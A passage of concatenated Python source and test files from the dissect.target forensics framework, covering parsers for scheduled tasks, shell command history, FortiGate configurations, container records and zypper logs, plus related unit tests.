                    record = WeeklyTriggerRecord(
                        weeks_between_triggers=int(weeks_between_triggers),
                        days_of_week=days_of_week,
                    )

                elif trigger.find("ScheduleByMonth/") is not None:
                    day_of_month = [int(day.text) for day in trigger.iter("Day")]
                    months_of_year = [month.tag for month in trigger.findall("*/Months/*")]
                    record = MonthlyDateTriggerRecord(
                        day_of_month=day_of_month,
                        months_of_year=months_of_year,
                    )

                elif trigger.find("ScheduleByMonthDayOfWeek/") is not None:
                    which_week = [int(week.text) for week in trigger.iter("Week")]
                    days_of_week = [day.tag for day in trigger.findall("*/DaysOfWeek/*")]
                    months_of_year = [month.tag for month in trigger.findall("*/Months/*")]
                    record = MonthlyDowTriggerRecord(
                        which_week=which_week,
                        days_of_week=days_of_week,
                        months_of_year=months_of_year,
                    )

                else:
                    raise ValueError("Unknown calendar type")

                yield GroupedRecord(CalendarTriggerRecord.name, [base, record])

            elif trigger_type == "WnfStateChangeTrigger":
                state_name = self.get_element("StateName", trigger)

                record = WnfTriggerRecord(
                    state_name=state_name,
                )

                yield GroupedRecord(WnfTriggerRecord.name, [base, record])

            elif trigger_type == "RegistrationTrigger":
                date = self.get_element("Date", trigger)

                record = RegistrationTrigger(
                    date=date,
                )

                yield GroupedRecord(RegistrationTrigger.name, [base, record])

            else:
                raise ValueError(f"Unknown trigger type: {trigger_type}")

    def get_actions(self) -> Iterator[GroupedRecord]:
        """Get the actions from the XML task data.

        Yields:
            ActionRecord: The action record representing an action.
        """
        for action in self.task_element.findall("Actions/*"):
            action_type = action.tag
            if action_type == "Exec":
                command = self.get_element("Actions/Exec/Command")
                args = self.get_element("Actions/Exec/Arguments")
                wrkdir = self.get_element("Actions/Exec/WorkingDirectory")
                yield ExecRecord(
                    action_type=action_type,
                    command=command,
                    arguments=args,
                    working_directory=wrkdir,
                )

            if action_type == "ComHandler":
                com_class_id = self.get_element("Actions/ComHandler/ClassId")
                com_data = self.get_raw("Actions/ComHandler/Data")
                yield ComHandlerRecord(
                    action_type=action_type,
                    class_id=com_class_id,
                    com_data=com_data,
                )

            if action_type == "SendEmail":
                email_server = self.get_element("Actions/ShowMessage/Server")
                email_subject = self.get_element("Actions/ShowMessage/Subject")
                email_to = self.get_element("Actions/ShowMessage/To")
                email_cc = self.get_element("Actions/ShowMessage/Cc")
                email_bcc = self.get_element("Actions/ShowMessage/Bcc")
                email_reply_to = self.get_element("Actions/ShowMessage/ReplyTo")
                email_from = self.get_element("Actions/ShowMessage/From")
                email_body = self.get_element("Actions/ShowMessage/Body")
                email_attachments = self.get_element("Actions/ShowMessage/Attachments/File")
                email_headers_name = self.get_element("Actions/ShowMessage/Headers/HeadersField/Name")
                email_headers_value = self.get_element("Actions/ShowMessage/Headers/headersField/Value")
                yield SendEmailRecord(
                    action_type=action_type,
                    server=email_server,
                    subject=email_subject,
                    to=email_to,
                    cc=email_cc,
                    bcc=email_bcc,
                    replyto=email_reply_to,
                    email_from=email_from,
                    header_name=email_headers_name,
                    header_value=email_headers_value,
                    body=email_body,
                    attachment=email_attachments,
                )

            if action_type == "ShowMessage":
                title = self.get_element("Actions/ShowMessage/Title")
                body = self.get_element("Actions/ShowMessage/Body")
                yield ShowMessageRecord(
                    action_type=action,
                    title=title,
                    body=body,
                )



from __future__ import annotations

import argparse
from datetime import datetime, timezone
from pathlib import Path
from typing import TYPE_CHECKING
from unittest.mock import Mock, patch

import pytest

from dissect.target.exceptions import UnsupportedPluginError
from dissect.target.plugin import Plugin, arg, find_functions
from dissect.target.tools.utils.cli import (
    args_to_uri,
    configure_generic_arguments,
    execute_function_on_target,
    generate_argparse_for_method,
    persist_execution_report,
    process_generic_arguments,
)

if TYPE_CHECKING:
    from dissect.target.target import Target


def test_persist_execution_report() -> None:
    output_path = Path("/tmp/test/path")
    report_data = {
        "item1": {
            "subitem1": "foo",
        },
        "item2": "bar",
    }
    timestamp = datetime(2000, 1, 1, tzinfo=timezone.utc)

    test_output = "TEST OUTPUT"

    with (
        patch("pathlib.Path.write_text") as mocked_write_text,
        patch("json.dumps", return_value=test_output) as mocked_json_dumps,
    ):
        full_path = persist_execution_report(output_path, report_data, timestamp)

        assert full_path.parent == output_path
        assert full_path.suffix == ".json"
        assert "2000-01-01-000000" in full_path.name

        mocked_json_dumps.assert_called_once_with(report_data, sort_keys=True, indent=4)

        mocked_write_text.assert_called_once_with(test_output)


@pytest.mark.parametrize(
    ("targets", "loader_name", "args", "uris"),
    [
        (["/path/to/somewhere"], "loader", ["--loader-option", "1"], ["loader:///path/to/somewhere?option=1"]),
        (["/path/to/somewhere"], "loader", ["--loader-option", "2"], ["loader:///path/to/somewhere?option=2"]),
        (["/path/to/somewhere"], "unknown", ["--unknown-option", "3"], ["unknown:///path/to/somewhere"]),
        (["/path/to/somewhere"], "loader", ["--ignored-option", "4"], ["loader:///path/to/somewhere"]),
        (["/path/to/somewhere"], "loader", [], ["loader:///path/to/somewhere"]),
        (["/path/to/somewhere"], "invalid", [], ["invalid:///path/to/somewhere"]),
    ],
)
def test_args_to_uri(targets: list[str], loader_name: str, args: list[str], uris: list[str]) -> None:
    @arg("--loader-option", dest="option")
    class FakeLoader:
        pass

    with patch("dissect.target.tools.utils.cli.LOADERS_BY_SCHEME", {"loader": FakeLoader}):
        assert args_to_uri(targets, loader_name, args) == uris


def test_process_generic_arguments(monkeypatch: pytest.MonkeyPatch) -> None:
    parser = argparse.ArgumentParser()
    configure_generic_arguments(parser)

    with monkeypatch.context() as m:
        m.setattr(
            "sys.argv",
            [
                "target-mock",
                "--keychain-file",
                "/path/to/keychain.csv",
                "--keychain-value",
                "some_value",
                "--loader",
                "loader_name",
                "--version",
                "--plugin-path",
                "/path/to/plugins",
                "--some-other-arg",
                "value",
            ],
        )

        args, _ = parser.parse_known_args()
        args.targets = ["target1", "target2"]

        with (
            patch("dissect.target.tools.utils.cli.configure_logging") as mocked_configure_logging,
            patch("dissect.target.tools.utils.cli.version", return_value="1.0.0") as mocked_version,
            patch("dissect.target.tools.utils.cli.sys.exit") as mocked_exit,
            patch(
                "dissect.target.tools.utils.cli.args_to_uri",
                return_value=["loader_name://target1", "loader_name://target2"],
            ) as mocked_args_to_uri,
            patch("dissect.target.tools.utils.cli.keychain.register_keychain_file") as mocked_register_keychain_file,
            patch("dissect.target.tools.utils.cli.keychain.register_wildcard_value") as mocked_register_wildcard_value,
            patch(
                "dissect.target.tools.utils.cli.get_external_module_paths", return_value=["/path/to/plugins"]
            ) as mocked_get_external_module_paths,
            patch("dissect.target.tools.utils.cli.load_modules_from_paths") as mocked_load_modules_from_paths,
        ):
            process_generic_arguments(parser, args)

            mocked_configure_logging.assert_called_once_with(0, False, as_plain_text=True)
            mocked_version.assert_called_once_with("dissect.target")
            mocked_exit.assert_called_once_with(0)
            mocked_args_to_uri.assert_called_once_with(["target1", "target2"], "loader_name")
            mocked_register_keychain_file.assert_called_once_with(Path("/path/to/keychain.csv"))
            mocked_register_wildcard_value.assert_called_once_with("some_value")
            mocked_get_external_module_paths.assert_called_once_with([Path("/path/to/plugins")])
            mocked_load_modules_from_paths.assert_called_once_with(["/path/to/plugins"])

            assert args.targets == ["loader_name://target1", "loader_name://target2"]

            del args.targets
            args.target = "target1"
            process_generic_arguments(parser, args)

            assert args.target == "loader_name://target1"


@pytest.mark.parametrize(
    ("pattern", "expected_function"),
    [
        ("passwords", "dissect.target.plugins.os.unix.shadow"),
        ("firefox.passwords", "Unsupported function `firefox.passwords`"),
    ],
)
def test_plugin_name_confusion_regression(target_unix_users: Target, pattern: str, expected_function: str) -> None:
    plugins, _ = find_functions(pattern, target_unix_users)
    assert len(plugins) == 1

    # We don't expect these functions to work since our target_unix_users fixture
    # does not include the neccesary artifacts for them to work. However we are
    # only interested in the plugin or namespace that was called so we check
    # the exception stack trace.
    with pytest.raises(UnsupportedPluginError) as exc_info:
        target_unix_users.get_function(plugins[0])

    assert expected_function in str(exc_info.value)


def test_plugin_mutual_exclusive_arguments() -> None:
    fargs = [
        (("--aa",), {"group": "aa"}),
        (("--bb",), {"group": "aa"}),
        (("--cc",), {"group": "bb"}),
        (("--dd",), {"group": "bb"}),
    ]
    method = test_plugin_mutual_exclusive_arguments
    method.__args__ = fargs
    with patch("inspect.isfunction", return_value=True):
        parser = generate_argparse_for_method(method)
    assert len(parser._mutually_exclusive_groups) == 2


def test_namespace_plugin_args() -> None:
    class Fake(Plugin):
        __namespace__ = "fake"
        __register__ = False

        @arg("--a")
        def __call__(self, a: str | None = None) -> None:
            return a

    mock_target = Mock()
    obj = Fake(mock_target)

    mock_target.get_function.return_value = Fake, obj

    _, result = execute_function_on_target(mock_target, Mock(), ["--a", "asdf", "--b", "123"])

    assert result == "asdf"



from __future__ import annotations

from typing import TYPE_CHECKING

from dissect.target import container
from dissect.target.helpers.fsutil import TargetPath
from dissect.target.loader import Loader

if TYPE_CHECKING:
    from pathlib import Path

    from dissect.target.target import Target


class MultiRawLoader(Loader):
    """Load multiple raw containers as a single target (i.e. a multi-disk system).

    Use as ``/path/to/disk1+/path/to/disk2`` to load a single target with two disks.
    The disks can be anything that Dissect supports such as EWF, VMDK, etc.
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs, resolve=False)

    @staticmethod
    def detect(path: Path) -> bool:
        if not path.exists() and "+" in str(path):
            return all(p.exists() for p in _split_paths(path))

        return False

    def map(self, target: Target) -> None:
        for subpath in _split_paths(self.path):
            target.disks.add(container.open(subpath))


def _split_paths(path: Path) -> list[Path]:
    root = path.joinpath("/") if isinstance(path, TargetPath) else path.cwd()

    return [root.joinpath(subpath) for subpath in str(path).split("+")]



from __future__ import annotations

import re

from dissect.target.helpers import fsutil
from dissect.target.plugin import OperatingSystem, Plugin, internal

re_quoted = re.compile(r"\"(.+?)\"")

REPLACEMENTS = [
    # Windows sometimes uses /systemroot/ instead of /%SystemRoot%/, so we
    # replace the former with the latter so expand_env() can replace it with
    # the correct value.
    (r"/systemroot/", r"/%systemroot%/"),
]

FALLBACK_SEARCH_PATHS = [
    "sysvol/windows/system32",
    "sysvol/windows/syswow64",
    "sysvol/windows",
    "sysvol/winnt/system32",
    "sysvol/winnt",
]


class ResolverPlugin(Plugin):
    def check_compatible(self) -> None:
        pass

    @internal
    def resolve(self, path: str, user: str | None = None) -> fsutil.TargetPath:
        """Resolve a partial path string to a file or directory present in the target.

        For Windows known file locations are searched, e.g. paths from the ``%path%`` variable and common
        path extensions tried. If a user SID is provided that user's ``%path%`` variable is used.
        """
        if not path:
            return self.target.fs.path(path)

        if self.target.os == OperatingSystem.WINDOWS:
            resolved_path = self.resolve_windows(path, user_sid=user)
        else:
            resolved_path = self.resolve_default(path, user_id=user)

        return self.target.fs.path(resolved_path)

    def resolve_windows(self, path: str, user_sid: str | None = None) -> str:
        # Normalize first so the replacements are easier
        path = fsutil.normalize(path, alt_separator=self.target.fs.alt_separator)

        for entry, environment in REPLACEMENTS:
            path = re.sub(entry, re.escape(environment), path, flags=re.IGNORECASE)

        path = self.target.expand_env(path, user_sid)
        # Normalize again because environment variable expansion may have introduced backslashes again
        path = fsutil.normalize(path, alt_separator=self.target.fs.alt_separator)

        # The \??\ pseudo path is used to point to the directory containing
        # (the user's) devices, e.g. \??\C:\foo\bar.
        # The \\?\ prefix in Windows file I/O bypasses string parsing and
        # allows exceeding the MAX_PATH limit, e.g. \\?\C:\very\long\path.
        # For more information see:
        # - https://googleprojectzero.blogspot.com/2016/02/the-definitive-guide-on-win32-to-nt.html
        # - https://stackoverflow.com/questions/23041983/path-prefixes-and
        # - https://learn.microsoft.com/en-us/windows/win32/fileio/naming-a-file#win32-file-namespaces
        path = path.replace("/??/", "").replace("/?/", "")

        if self.target.fs.exists(path):
            return path

        # Very simplistic lookup for an executable as part of an `"path/to/executable" -arguments -here` construction
        quoted = re_quoted.findall(path)
        if quoted and self.target.fs.exists(quoted[0]):
            return quoted[0]

        # Construct a list of search paths to look in. If a user SID is given, both the system and user search paths are
        # used, else only the system search paths.
        search_paths = []
        user_env_vars = self.target.user_env(user_sid)
        user_path_env = user_env_vars.get("%path%")
        if user_path_env:
            for path_env in user_path_env.split(";"):
                # Normalize because environment variable may contain backslashes
                path_env = fsutil.normalize(path_env, alt_separator=self.target.fs.alt_separator).rstrip("/")
                search_paths.append(path_env)
        if not search_paths:
            search_paths = FALLBACK_SEARCH_PATHS

        # Windows supports some path resolution when leaving out the extension or full path.
        # The string given to this function may be a command string including arguments, so split on spaces and,
        # appending one part at a time, check if a file exists with an allowed extension and in any of the search paths.
        # If it does, it's probably the file we're looking for.
        lookup = ""
        parts = path.split(" ")
        pathext = self.target.pathext | {""}

        for part in parts:
            lookup = f"{lookup} {part}" if lookup else part
            for ext in pathext:
                lookup_ext = lookup + ext
                if self.target.fs.is_file(lookup_ext):
                    return lookup_ext

                for search_path in search_paths:
                    lookup_path = fsutil.join(search_path, lookup_ext, alt_separator=self.target.fs.alt_separator)
                    if self.target.fs.is_file(lookup_path):
                        return lookup_path

        return path

    def resolve_default(self, path: str, user_id: str | None = None) -> str:
        return fsutil.normalize(path, alt_separator=self.target.fs.alt_separator)



from __future__ import annotations

from typing import TYPE_CHECKING
from unittest.mock import Mock

from dissect.target.filesystem import VirtualFile, VirtualFilesystem
from dissect.target.plugins.filesystem.unix.capability import CapabilityPlugin

if TYPE_CHECKING:
    from dissect.target.target import Target


def test_capability_plugin(target_unix: Target, fs_unix: VirtualFilesystem) -> None:
    # Some fictional capability values
    xattr1 = Mock()
    xattr1.name = "security.capability"
    xattr1.value = bytes.fromhex("010000010020F00000F00F0F")

    xattr2 = Mock()
    xattr2.name = "security.capability"
    xattr2.value = bytes.fromhex("010000020020F00F00F00F00F00F00F00F0F0100")

    xattr3 = Mock()
    xattr3.name = "security.capability"
    xattr3.value = bytes.fromhex("000000030020000000000000000000000000000039050000")

    vfile1 = VirtualFile(fs_unix, "file", None)
    vfile1.lattr = Mock()
    vfile1.lattr.return_value = [xattr1]
    fs_unix.map_file_entry("/path/to/xattr1/file", vfile1)

    vfile2 = VirtualFile(fs_unix, "file", None)
    vfile2.lattr = Mock()
    vfile2.lattr.return_value = [xattr2]
    fs_unix.map_file_entry("/path/to/xattr2/file", vfile2)

    vfile3 = VirtualFile(fs_unix, "file", None)
    vfile3.lattr = Mock()
    vfile3.lattr.return_value = [xattr3]
    fs_unix.map_file_entry("/path/to/xattr3/file", vfile3)

    target_unix.add_plugin(CapabilityPlugin, check_compatible=False)

    results = list(target_unix.capability_binaries())
    assert len(results) == 3

    assert results[0].path == "/path/to/xattr1/file"
    assert results[0].permitted == [
        "CAP_NET_RAW",
        "CAP_SYS_PACCT",
        "CAP_SYS_ADMIN",
        "CAP_SYS_BOOT",
        "CAP_SYS_NICE",
    ]
    assert results[0].inheritable == [
        "CAP_NET_ADMIN",
        "CAP_NET_RAW",
        "CAP_IPC_LOCK",
        "CAP_IPC_OWNER",
        "CAP_SYS_MODULE",
        "CAP_SYS_RAWIO",
        "CAP_SYS_CHROOT",
        "CAP_SYS_PTRACE",
        "CAP_SYS_RESOURCE",
        "CAP_SYS_TIME",
        "CAP_SYS_TTY_CONFIG",
        "CAP_MKNOD",
    ]
    assert results[0].effective
    assert results[0].root_id is None

    assert results[1].path == "/path/to/xattr2/file"
    assert results[1].permitted == [
        "CAP_NET_RAW",
        "CAP_SYS_PACCT",
        "CAP_SYS_ADMIN",
        "CAP_SYS_BOOT",
        "CAP_SYS_NICE",
        "CAP_SYS_RESOURCE",
        "CAP_SYS_TIME",
        "CAP_SYS_TTY_CONFIG",
        "CAP_MKNOD",
        "CAP_BLOCK_SUSPEND",
        "CAP_AUDIT_READ",
        "CAP_PERFMON",
        "CAP_BPF",
        "CAP_CHECKPOINT_RESTORE",
    ]
    assert results[1].inheritable == [
        "CAP_NET_ADMIN",
        "CAP_NET_RAW",
        "CAP_IPC_LOCK",
        "CAP_IPC_OWNER",
        "CAP_SYS_MODULE",
        "CAP_SYS_RAWIO",
        "CAP_SYS_CHROOT",
        "CAP_SYS_PTRACE",
        "CAP_MAC_OVERRIDE",
        "CAP_MAC_ADMIN",
        "CAP_SYSLOG",
        "CAP_WAKE_ALARM",
        "CAP_CHECKPOINT_RESTORE",
    ]
    assert results[1].effective
    assert results[1].root_id is None

    assert results[2].path == "/path/to/xattr3/file"
    assert results[2].permitted == ["CAP_NET_RAW"]
    assert results[2].inheritable == []
    assert not results[2].effective
    assert results[2].root_id == 1337



import gzip
from io import BytesIO

from dissect.target.filesystem import VirtualFilesystem
from dissect.target.plugins.os.unix.linux.fortios._os import FortiOSPlugin
from dissect.target.plugins.os.unix.linux.fortios.generic import GenericPlugin
from dissect.target.plugins.os.unix.linux.fortios.locale import FortiOSLocalePlugin
from dissect.target.target import Target


def test_fortigate_os(target_unix: Target, fs_unix: VirtualFilesystem) -> None:
    """Test if we detect FortiGate OS correctly."""

    global_config = """\
    #config-version=FGVM64-7.4.2-FW-build2571-231219:opmode=0:vdom=0
    config system global
        set alias "FortiGate-VM64"
        set hostname "FortiGate-VM64"
        set timezone "US/Pacific"
    end
    config system admin
        edit "admin"
            set accprofile "super_admin"
            set vdom "root"
            set password ENC SH22zS4+QvU399DXuDApIVHu5fGh3wQCwO1aGeqlbA08G9tB/DvJsqLdG9HA18=
        next
    end
    config system dns
        set primary 96.45.45.45
        set secondary 96.45.46.46
    end
    """

    iface_config = """\
    edit "port1"
        set vdom "root"
        set ip 1.2.3.4 255.255.255.0
        set allowaccess https
        set type physical
        set snmp-index 1
    next
    """

    root_config = """\
    config user group
        edit "Guest-group"
            set member "guest"
        next
    end
    config user local
        edit "guest"
            set type password
            set passwd ENC pATZu+74jg21Ktwn9zMDS/bGcYumPFDZMnBKh+86851cd0Ig2CS1zbqQa7mpUGpCNfnDKlDkjobzwIlUbXkHgRYxBWWf99DtTvm7g7UsEBGnf8Xa06ZNd62b5Zb4MVfKQJ/uh5Ky0dI4RujLfv8PqrU7VVKKTAPUdzEtC5ehWZzUxRAFohNM6WhklTUpLV58M+zoRA==
        next
    end
    """  # noqa: E501

    fs_unix.map_file_fh("/.flatkc", BytesIO())
    fs_unix.map_file_fh("/rootfs.gz", BytesIO())
    fs_unix.map_file_fh("/data/config/sys_global.conf.gz", BytesIO(gzip.compress(global_config.encode())))
    fs_unix.map_file_fh("/data/config/global_system_interface.gz", BytesIO(gzip.compress(iface_config.encode())))
    fs_unix.map_file_fh("/data/config/sys_vd_root+root.conf.gz", BytesIO(gzip.compress(root_config.encode())))
    fs_unix.map_file_fh(
        "/bin/grep", BytesIO(bytes.fromhex("7f454c4602010100000000000000000002003e0001000000004b4000000000"))
    )

    target_unix.add_plugin(FortiOSPlugin)
    target_unix.add_plugin(FortiOSLocalePlugin)
    target_unix.add_plugin(GenericPlugin)

    # tests FortiOSPlugin.detect() indirectly
    assert target_unix.os == "fortios"

    target_unix._os_plugin = FortiOSPlugin
    target_unix.apply()

    assert target_unix.os == "fortios"
    assert target_unix.hostname == "FortiGate-VM64"
    assert target_unix.version == "FortiGate VM 7.4.2 (build 2571, 2023-12-19)"
    assert target_unix.ips == ["1.2.3.4"]
    assert target_unix.dns == ["96.45.45.45", "96.45.46.46"]
    assert target_unix.architecture == "x86_64-unix"
    assert target_unix.language == "en_US"
    assert target_unix.timezone == "US/Pacific"

    users = list(target_unix.users())
    assert len(users) == 2
    assert users[0].hostname == "FortiGate-VM64"
    assert users[0].name == "admin"
    assert users[0].groups == ["super_admin"]
    assert users[0].password == "ENC:SH22zS4+QvU399DXuDApIVHu5fGh3wQCwO1aGeqlbA08G9tB/DvJsqLdG9HA18="
    assert users[0].home == "/root"

    assert users[1].hostname == "FortiGate-VM64"
    assert users[1].name == "guest"
    assert users[1].groups == ["Guest-group"]
    assert users[1].password == "guest"
    assert users[1].home is None



from __future__ import annotations

import re
from typing import TYPE_CHECKING

from dissect.util.ts import from_unix

from dissect.target.exceptions import UnsupportedPluginError
from dissect.target.helpers.descriptor_extensions import UserRecordDescriptorExtension
from dissect.target.helpers.record import UnixUserRecord, create_extended_descriptor
from dissect.target.plugin import Plugin, alias, export, internal

if TYPE_CHECKING:
    from collections.abc import Iterator
    from pathlib import Path

    from dissect.target.helpers.fsutil import TargetPath
    from dissect.target.target import Target

CommandHistoryRecord = create_extended_descriptor([UserRecordDescriptorExtension])(
    "unix/history",
    [
        ("datetime", "ts"),
        ("varint", "order"),
        ("string", "command"),
        ("string", "shell"),
        ("path", "source"),
    ],
)

RE_EXTENDED_BASH = re.compile(r"^#(?P<ts>\d{10})$")
RE_EXTENDED_ZSH = re.compile(r"^: (?P<ts>\d{10}):\d+;(?P<command>.*)$")
RE_FISH = re.compile(r"- cmd: (?P<command>.+?)\s+when: (?P<ts>\d+)")


class CommandHistoryPlugin(Plugin):
    """UNIX command history plugin."""

    COMMAND_HISTORY_RELATIVE_PATHS = (
        ("bash", ".bash_history"),
        ("fish", ".local/share/fish/fish_history"),
        ("mongodb", ".dbshell"),
        ("mysql", ".mysql_history"),
        ("postgresql", ".psql_history"),
        ("python", ".python_history"),
        ("sqlite", ".sqlite_history"),
        ("zsh", ".zsh_history"),
        ("ash", ".ash_history"),
        ("dissect", ".dissect_history"),  # wow so meta
    )

    def __init__(self, target: Target):
        super().__init__(target)
        self._history_files = list(self._find_history_files())

    def check_compatible(self) -> None:
        if not len(self._history_files):
            raise UnsupportedPluginError("No command history found")

    def _find_history_files(self) -> list[tuple[str, TargetPath, UnixUserRecord]]:
        """Find existing history files."""
        history_files = []
        for user_details in self.target.user_details.all_with_home():
            for shell, history_relative_path in self.COMMAND_HISTORY_RELATIVE_PATHS:
                history_path = user_details.home_path.joinpath(history_relative_path)
                if history_path.is_file():
                    history_files.append((shell, history_path, user_details.user))
        return history_files

    @alias("bashhistory")
    @export(record=CommandHistoryRecord)
    def commandhistory(self) -> Iterator[CommandHistoryRecord]:
        """Return shell history for all UNIX users.

        When using a shell, history of the used commands can be kept on the system. These are usually written to
        a hidden file named ``.$SHELL_history`` and may expose commands that were used by an adversary.
        """

        for shell, history_path, user in self._history_files:
            if shell == "zsh":
                yield from self.parse_zsh_history(history_path, user)

            elif shell == "fish":
                yield from self.parse_fish_history(history_path, user)

            else:
                yield from self.parse_generic_history(history_path, user, shell)

    @internal
    def parse_generic_history(self, file: Path, user: UnixUserRecord, shell: str) -> Iterator[CommandHistoryRecord]:
        """Parse ``bash_history`` contents.

        Regular ``.bash_history`` files contain one plain command per line.
        Extended ``.bash_history`` files look like this:

        .. code-block::

            #1648598339
            echo "this is a test"

        References:
            - http://git.savannah.gnu.org/cgit/bash.git/tree/bashhist.c
        """
        next_cmd_ts = None

        i = 0
        for line in file.open("rt", errors="replace"):
            ts = None
            line = line.strip()

            if not line:
                continue

            if line.startswith("#") and (extended_bash_match := RE_EXTENDED_BASH.match(line)):
                next_cmd_ts = from_unix(int(extended_bash_match["ts"]))
                continue

            if next_cmd_ts:
                ts = next_cmd_ts
                next_cmd_ts = None

            yield CommandHistoryRecord(
                ts=ts,
                command=line,
                order=i,
                shell=shell,
                source=file,
                _target=self.target,
                _user=user,
            )

            i += 1

    @internal
    def parse_zsh_history(self, file: Path, user: UnixUserRecord) -> Iterator[CommandHistoryRecord]:
        """Parse ``zsh_history`` contents.

        Regular ``.zsh_history`` lines are just the plain commands. Extended ``.zsh_history`` files look like this:

        .. code-block::

            : 1673860722:0;sudo apt install sl
            : :;

        References:
            - https://sourceforge.net/p/zsh/code/ci/master/tree/Src/hist.c
        """
        i = 0
        for line in file.open("rt", errors="replace"):
            line = line.strip()

            if not line or line == ": :;":
                continue

            if line.startswith(":") and (extended_zsh_match := RE_EXTENDED_ZSH.match(line)):
                ts = from_unix(int(extended_zsh_match["ts"]))
                command = extended_zsh_match["command"]
            else:
                ts = None
                command = line

            yield CommandHistoryRecord(
                ts=ts,
                command=command,
                order=i,
                shell="zsh",
                source=file,
                _target=self.target,
                _user=user,
            )

            i += 1

    @internal
    def parse_fish_history(self, history_file: TargetPath, user: UnixUserRecord) -> Iterator[CommandHistoryRecord]:
        """Parses the history file of the fish shell.

        The fish history file is formatted as pseudo-YAML. An example of such a file:

        .. code-block::

            - cmd: ls
            when: 1688642435
            - cmd: cd home/
            when: 1688642441
            paths:
                - home/
            - cmd: echo "test: test"
            when: 1688986629

        Note that the last ``- cmd: echo "test: test"`` is not valid YAML,
        which is why we cannot safely use the Python yaml module.

        References:
            - https://github.com/fish-shell/fish-shell/blob/master/src/history.cpp
        """

        with history_file.open("r") as h_file:
            history_data = h_file.read()

        for i, (command, ts) in enumerate(RE_FISH.findall(history_data)):
            yield CommandHistoryRecord(
                ts=from_unix(int(ts)),
                command=command,
                order=i,
                shell="fish",
                source=history_file,
                _target=self.target,
                _user=user,
            )



from __future__ import annotations

from typing import Any, BinaryIO

from dissect.cstruct.types.base import BaseType


class ProtobufVarint(BaseType):
    """Implements a protobuf integer type for dissect.cstruct that can span a variable amount of bytes.

    Supports protobuf's msb varint implementation.

    References:
        - https://protobuf.dev/programming-guides/encoding/
        - https://github.com/protocolbuffers/protobuf/blob/main/python/google/protobuf/internal/decoder.py
    """

    @classmethod
    def _read(cls, stream: BinaryIO, context: dict[str, Any] | None = None) -> int:
        return decode_varint(stream)

    @classmethod
    def _write(cls, stream: BinaryIO, data: int) -> int:
        return stream.write(encode_varint(data))


def decode_varint(stream: BinaryIO) -> int:
    """Reads a varint from the provided buffer stream.

    If we have not reached the end of a varint, the msb will be 1.
    We read every byte from our current position until the msb is 0.
    """
    result = 0
    i = 0
    while True:
        byte = stream.read(1)
        result |= (byte[0] & 0x7F) << (i * 7)
        i += 1
        if byte[0] & 0x80 == 0:
            break

    return result


def encode_varint(number: int) -> bytes:
    """Encode a decoded protobuf varint to its original bytes."""
    buf = []
    while True:
        towrite = number & 0x7F
        number >>= 7
        if number:
            buf.append(towrite | 0x80)
        else:
            buf.append(towrite)
            break
    return bytes(buf)



from __future__ import annotations

from dissect.target.plugin import NamespacePlugin

COMMON_IMAGE_FIELDS = [
    ("string", "name"),
    ("string", "tag"),
    ("string", "image_id"),
    ("string", "hash"),
    ("datetime", "created"),
    ("path", "source"),
]

COMMON_CONTAINER_FIELDS = [
    ("string", "container_id"),
    ("string", "image"),
    ("string", "image_id"),
    ("string", "command"),
    ("datetime", "created"),
    ("boolean", "running"),
    ("varint", "pid"),
    ("datetime", "started"),
    ("datetime", "finished"),
    ("string[]", "ports"),
    ("string", "name"),
    ("string[]", "volumes"),
    ("string[]", "environment"),
    ("path", "mount_path"),
    ("path", "config_path"),
    ("path", "image_path"),
    ("path", "source"),
]

COMMON_LOG_FIELDS = [
    ("datetime", "ts"),
    ("string", "container"),
    ("string", "stream"),
    ("string", "message"),
    ("path", "source"),
]


class ContainerPlugin(NamespacePlugin):
    __namespace__ = "container"



from __future__ import annotations

from datetime import datetime
from typing import TYPE_CHECKING

from dissect.target.exceptions import UnsupportedPluginError
from dissect.target.helpers.fsutil import open_decompress
from dissect.target.plugin import export
from dissect.target.plugins.os.unix.packagemanager import (
    OperationTypes,
    PackageManagerLogRecord,
    PackageManagerPlugin,
)

if TYPE_CHECKING:
    from collections.abc import Iterator


class ZypperPlugin(PackageManagerPlugin):
    """Zypper package manager plugin."""

    __namespace__ = "zypper"

    LOG_DIR_PATH = "/var/log/zypp"
    LOG_FILES_GLOB = "history*"

    def check_compatible(self) -> None:
        if not next(self.target.fs.path(self.LOG_DIR_PATH).glob(self.LOG_FILES_GLOB), None):
            raise UnsupportedPluginError("No zypper files found")

    @export(record=PackageManagerLogRecord)
    def logs(self) -> Iterator[PackageManagerLogRecord]:
        """Package manager log parser for SuSE's Zypper.

        Example log format::

            2022-12-16 12:56:23|command|root@ec9fa6d67dda|'zypper' 'install' 'unzip'|
            2022-12-16 12:56:23|install|update-alternatives|1.21.8-1.4|x86_64||repo-oss|b4d6389437e306d6104559c82d09fce15c4486fbc7fd215cc33d265ff729aaf1|
            # 2022-12-16 12:56:23 unzip-6.00-41.1.x86_64.rpm installed ok
            # Additional rpm output:
            # update-alternatives: using /usr/bin/unzip-plain to provide /usr/bin/unzip (unzip) in auto mode
            #
            2022-12-16 12:56:23|install|unzip|6.00-41.1|x86_64|root@ec9fa6d67dda|repo-oss|d7e42c9d83f97cf3b7eceb4d3fa64e445a33a7a33f387366734c444d5571cb3a|
            2022-12-16 12:57:50|command|root@ec9fa6d67dda|'zypper' 'remove' 'unzip'|
            # 2022-12-16 12:57:50 unzip-6.00-41.1.x86_64 removed ok
            # Additional rpm output:
            # update-alternatives: warning: alternative /usr/bin/unzipsfx-plain (part of link group unzipsfx) doesn't exist; removing from list of alternatives
            # update-alternatives: warning: alternative /usr/bin/zipgrep-plain (part of link group zipgrep) doesn't exist; removing from list of alternatives
            #
            2022-12-16 12:57:50|remove |unzip|6.00-41.1|x86_64|root@ec9fa6d67dda|
            2022-12-16 12:58:49|command|root@ec9fa6d67dda|'zypper' 'install' 'unzip'|
        """  # noqa E501
        target_tz = self.target.datetime.tzinfo

        for path in self.target.fs.path(self.LOG_DIR_PATH).glob(self.LOG_FILES_GLOB):
            for line in open_decompress(path, "rt"):
                line = line.strip()

                # We don't parse additional output logs (#) or empty lines
                if not line or line.startswith("#"):
                    continue

                ts, operation, *remainder = line.split("|")
                ts = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S").replace(tzinfo=target_tz)
                operation = OperationTypes.infer(operation)

                record = PackageManagerLogRecord(
                    ts=ts,
                    package_manager="zypper",
                    operation=operation.value,
                    _target=self.target,
                )

                if operation == OperationTypes.Install:
                    # 2022-12-16 12:56:23|install|update-alternatives|1.21.8-1.4|x86_64||repo-oss|b4d6389437e306d6104559c82d09fce15c4486fbc7fd215cc33d265ff729aaf1|  # noqa E501
